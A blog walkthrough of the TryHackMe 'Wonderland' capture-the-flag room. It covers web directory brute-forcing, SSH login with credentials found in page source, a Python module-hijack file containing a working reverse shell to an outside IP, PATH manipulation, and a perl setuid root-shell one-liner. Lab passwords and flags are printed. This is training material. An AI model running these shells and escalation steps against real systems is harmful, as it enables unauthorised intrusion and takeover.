Tryhackme - Wonderland

Tryhackme – Wonderland

In this walk through, we will be going through the Wonderland from Tryhackme. This room is rated as Medium on the platform and the objective is to grab two flags from the machine by showcasing skills in Enumeration, Exploitation and horizontal & vertical Privilege Escalation. So, let’s get started without any delay.

Wonderland

Machine Info:

TitleWonderland
IPaddress10.10.15.200
DifficultyMedium
ObjectiveEnter Wonderland and capture the flags.

Enumeration:

  • Checking if machine is live or not

Pinging the machine

  • I perfomed a Nmap scan and got port 22 and 80 opened.

sudo nmap -sS -sV 10.10.15.200

nmap scan

  • Next, i started enumerating port 80 which was running a Golang web server.

Home Page

  • Fired gobuster to reveal some hidden directories. Find one – /r

wh1terose@fsociety:~$ gobuster dir -u http://10.10.15.200/ -w ~/Desktop/Wordlist/common.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.15.200/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/03/17 20:15:31 Starting gobuster in directory enumeration mode
===============================================================
/img                  (Status: 301) [Size: 0] [--> img/]
/index.html           (Status: 301) [Size: 0] [--> ./]  
/r                    (Status: 301) [Size: 0] [--> r

  • Navigating to the /r, we got the message to “Keep Going“. I again fire up the gobuster on the existing URL.

bruteforcing directory

wh1terose@fsociety:~$ gobuster dir -u http://10.10.15.200/r/ -w ~/Desktop/Wordlist/common.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.15.200/r/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/03/17 20:17:56 Starting gobuster in directory enumeration mode
===============================================================
/a                    (Status: 301) [Size: 0] [--> a/]
/index.html           (Status: 301) [Size: 0] [--> ./]
                                                      
===============================================================
2023/03/17 20:19:40 Finished
===============================================================

bruteforcing directory

wh1terose@fsociety:~$ gobuster dir -u http://10.10.15.200/r/a/ -w ~/Desktop/Wordlist/common.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.15.200/r/a/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/03/17 20:19:49 Starting gobuster in directory enumeration mode
===============================================================
/b                    (Status: 301) [Size: 0] [--> b/]
/index.html           (Status: 301) [Size: 0] [--> ./]
                                                      
===============================================================
2023/03/17 20:21:29 Finished
===============================================================

bruteforcing directory

  • This seems like, we are completing the word “Rabbit” in the directory search.

bruteforcing directory

bruteforcing directory

the rabbit directory

  • Checking the page source code using Ctrl+U got a potential user-password combination – alice:HowDothTheLittleCrocodileImproveHisShiningTail

alice password

Initial Access:

  • Used the creds to log into the machine using SSH.

ssh login

  • Everything is upside down. Getting the user flag in the root directory.

user flag

  • Next we checked what elevated commands we can run using sudo -l. We can’t find anything on us however we found that the walrus_and_the_carpenter.py can be run by the user – rabbit.

sudo -l

  • Upon checking the content of the walrus_and_the_carpenter.py, we found out that it is using the random module.

random module

Privilege Escalation:

  • I came accross the Path hijacking vulnerability in python where we can hijack a path of the module if we have a write permission. So, next we make a file named with random.py which will trigger our code and provide us the shell of the user.

import os
import pty
import socket

lhost = "10.18.11.103"
lport = 4444

ZIP_DEFLATED = 0

class ZipFile:
    def close(*args):
        return

    def write(*args):
        return

    def __init__(self, *args):
        return

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((lhost, lport))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
os.putenv("HISTFILE",'/dev/null')
pty.spawn("/bin/bash")
s.close()

python script

sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py

walrus_and_the_carpenter.py

netcat listener

teaParty

Segmentation fault teaParty

  • Viewing the contents of the teaParty. we found a string where the script is querying the date binary, which we can exploit using PATH manipulation.

date binary

  • I tried to make a file named “date” and spawn a shell using it but i was unable to do so, neither using nano nor vim. So i made the file in my local machine and then transferred it using wget.

chmod +x date
echo $PATH
export PATH=/home/rabbit:$PATH
echo $PATH
./teaParty

./teaParty

  • Next we found a password.txt file in the user hatter directory. I found a password in it. I downloaded linpeas in the machine to enumerate for priv esc vectors however it got stuck in the date section. So, i tried the new password to SSH into the user hatter and got the success. Meanwhile i re-spwan the rabbit shell and delete the date file we made earlier to avoid the conflict while using linpeas.

password.txt

teaParty

  • hatter SSH password – WhyIsARavenLikeAWritingDesk?

SSH hatter login

  • In the linpeas results, we find that we have a capability set to a perl file. We can use it as a backdoor to escalate our privileges by manipulating its process UID

linpeas output

Capabilities GTFObins

cp $(which perl) .
/usr/bin/perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'

  • With this, we successfully rooted this box and got our root flag as a sign of victory.

root flag

Task 1 – Capture the flags

Question 1 – Obtain the flag in user.txt

thm{"Curiouser and curiouser!"}

Question 2 – Escalate your privileges, what is the flag in root.txt?

thm{Twinkle, twinkle, little bat! How I wonder what you’re at!}

Task 1 - Capture the flags

Also Read: Tryhackme – Windows PrivEsc

Conclusion:

Conclusion

So that was “Wonderland” for you. We started off with a regular nmap scan and found two ports opened – 80 (HTTP) and 22 (SSH). Next, performed directory bruteforcing with gobuster and found directory pattern of r/a/b/b/i/t. Moving on, found the credentials of alice in Page source code and got our initial access via SSH. Once inside, got the user flag in the root directory. In the alice directory, we found a python script utilizing the random module. Used path hijacking to get a shell of the user rabbit. Then, performed path manipulation on date binary to get access to user hatter. Found SSH password of hatter in his home directory and using that logged into his account. At last, used Linpeas to find potential Priv esc vectors and found that perl had a capabilities set. With the help of that, escalated our privileges to root and got the root flag in the root directory along side the tampon of Lord Putin. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top